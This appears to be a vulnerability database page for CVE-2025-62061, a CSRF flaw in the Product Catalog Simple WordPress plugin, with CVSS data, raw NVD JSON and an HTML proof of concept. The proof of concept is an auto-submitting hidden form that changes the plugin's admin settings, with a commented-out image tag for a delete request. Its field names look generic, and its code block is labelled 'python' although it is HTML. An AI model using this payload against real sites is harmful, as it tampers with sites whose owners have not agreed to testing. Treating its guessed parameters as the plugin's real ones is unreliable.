Security Vulnerability Report
中文
CVE-2025-62061 CVSS 4.3 MEDIUM

CVE-2025-62061

Published: 2025-10-22 15:16:05
Last Modified: 2026-04-27 18:16:25

Description

Cross-Site Request Forgery (CSRF) vulnerability in impleCode Product Catalog Simple post-type-x.This issue affects Product Catalog Simple: from n/a through <= 1.8.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Product Catalog Simple (post-type-x) <= 1.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62061 - Product Catalog Simple CSRF --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-62061</title> </head> <body> <h1>CSRF PoC for Product Catalog Simple Plugin</h1> <p>This PoC demonstrates a CSRF vulnerability in Product Catalog Simple <= 1.8.4</p> <!-- Example: Malicious form to modify plugin settings --> <form action="http://target-site.com/wp-admin/admin.php?page=product_catalog" method="POST" id="csrfForm"> <input type="hidden" name="action" value="save_settings"> <input type="hidden" name="catalog_name" value="Malicious Catalog"> <input type="hidden" name="catalog_slug" value="malicious"> <input type="hidden" name="submit_settings" value="1"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the form has been submitted.</p> </body> </html> <!-- Alternative: Image-based GET request CSRF (for simpler actions) --> <!-- <img src="http://target-site.com/wp-admin/admin.php?page=product_catalog&action=delete&id=1" width="0" height="0"> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62061", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:05.213", "lastModified": "2026-04-27T18:16:24.957", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in impleCode Product Catalog Simple post-type-x.This issue affects Product Catalog Simple: from n/a through <= 1.8.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/post-type-x/vulnerability/wordpress-product-catalog-simple-plugin-1-8-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}